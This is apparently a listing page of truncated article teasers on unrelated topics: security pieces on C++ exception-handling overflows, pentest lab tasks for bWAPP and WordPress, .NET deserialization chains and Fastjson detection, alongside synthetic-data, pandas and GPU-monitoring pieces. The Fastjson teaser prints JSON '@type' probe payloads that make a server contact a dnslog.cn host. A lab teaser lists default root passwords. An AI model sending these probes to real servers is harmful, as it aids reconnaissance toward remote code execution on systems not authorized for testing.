Attack and utilization techniques of overflow vulnerabilities in exception handling – Part 1

This article focuses on the exception handling corresponding to C++ under Linux, that is, the study of attack methods for the unwind exception handling process based on eh_frame. Since there are certain differences in the exception handling process and underlying implementation in different operating systems and languages, specific issues need to be dealt with on […]

The greatest utilization value of synthetic data in 2023

Developing successful AI and ML models requires access to large amounts of high-quality data. However, collecting such data is challenging because: Many business problems that AI/ML models can solve require access to sensitive customer data, such as personally identifiable information (PII) or personal health information (PHI). The collection and use of sensitive data raises privacy […]

pandas calculates the photovoltaic power generation time utilization rate of charging stations through charging orders

1. Case background The existing electric vehicle charging station order record data set contains data from many stations and many days. The data intercepts data from 6 am to 19 pm. The fields include the name of the charging station, the name of the charging pile, the name of the charging gun, and the start […]

NVIDIAGet GPU utilization-cpp.md

In deep learning inference, in order to utilize GPU more efficiently, you need to pay attention to creating new instances and allocating them to different GPU devices among multiple inference task instances. How much is left to the current GPU for better allocation? Code Directory . ├── CMakeLists.txt ├── src │ └── main.cpp ├── ubuntu_build.sh […]

E049-Forum vulnerability analysis and utilization-Exploration of web penetration testing for bwapp

Course name: E049-Forum vulnerability analysis and utilization-Exploration of web penetration testing for bwapp Course Category: Forum vulnerability analysis and utilization ————————————————– ————————————————– ————————– Experimental Level: intermediate Task scenario: 【Task Scenario】 Panshi Company invites penetration testers to conduct penetration testing on the company’s forum. Due to the particularity of the company’s departments, the company requires penetration […]

E047-Forum Vulnerability Analysis and Utilization-Exploration of information collection and vulnerability scanning for WordPress forums

Task implementation: E047-Forum Vulnerability Analysis and Utilization-Exploration of information collection and vulnerability scanning for WordPress forums Task environment description: Server scenario: p9_kali-6 (username: root; password: toor) Server scenario operating system: Kali Linux 192.168.32.178 Server scenario: p9_linux-7 (username: root; password: 123456) Server scenario operating system: Linux 192.168.32.179 Network structure topology Reproduction in actual combat Use the […]

.NET–XML deserialization utilization chain analysis

1. The ObjectDataProvider class is located in the System.Windows.Data namespace and encapsulated in the PresentationFramework.dll assembly. Its main function is to provide an instantiated object of a non-static class as a data source for WPF control binding. There are three main categories: Usage: 1. Obtain the type information of the instantiated class through C#typeof. The […]

Detection and utilization of Fastjson in actual combat

Detection Reference: https://github.com/alibaba/fastjson/issues/3077 jndi vulnerability detection {“@type”:”java.net.InetAddress”,”val”:”x166os.dnslog.cn”} The java.net.InetAddress gadget was disabled in 1.2.49. If the above POC can produce dnslog, it means that there is a high probability that it can rce. Backend detection {“@type”:”java.net.Inet4Address”,”val”:”dnslog”} {“@type”:”java.net.Inet6Address”,”val”:”dnslog”} {“@type”:”java.net.InetSocketAddress”{“address”:,”val”:”dnslog”}} {“@type”:”com.alibaba.fastjson.JSONObject”, {“@type”: “java.net.URL”, “val”:”dnslog”} }””} {{“@type”:”java.net.URL”,”val”:”dnslog”}:”aaa”} Set[{“@type”:”java.net.URL”,”val”:”dnslog”}] Set[{“@type”:”java.net.URL”,”val”:”dnslog”} {{“@type”:”java.net.URL”,”val”:”dnslog”}:0 If the above POC can generate dnslog, it […]